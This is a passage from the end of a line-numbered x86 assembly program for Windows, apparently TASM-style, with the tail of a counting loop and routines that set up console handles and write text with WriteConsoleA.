  560.     add     eax, ecx
  561.     mov     edx, eax
  562.     inc     ebx
  563.     inc     edi
  564.     cmp     edi, 0ah
  565.     jnz     lewp2
  566.  
  567. end_it:
  568.     pop     edi ecx eax
  569.     ret
  570. endp
  571.  
  572. init_console  proc
  573.     push    -10
  574.     call    GetStdHandle
  575.     or      eax, eax
  576.     je      init_error
  577.     mov     [console_in], eax
  578.     push    -11
  579.     call    GetStdHandle
  580.     or      eax, eax
  581.     je      init_error
  582.     mov     [console_out], eax
  583.     ret
  584. init_error:
  585.     push    0
  586.     call    ExitProcess
  587. endp
  588.  
  589. write_console proc    text_out:dword, text_len:dword
  590.     pusha
  591.     push    0
  592.     push    offset bytes_read 
  593.     push    text_len          
  594.     push    text_out          
  595.     push    console_out       
  596.     call    WriteConsoleA
  597.     popa
  598.     ret
  599. endp
  600.  
  601. end     start
  602.  
  603.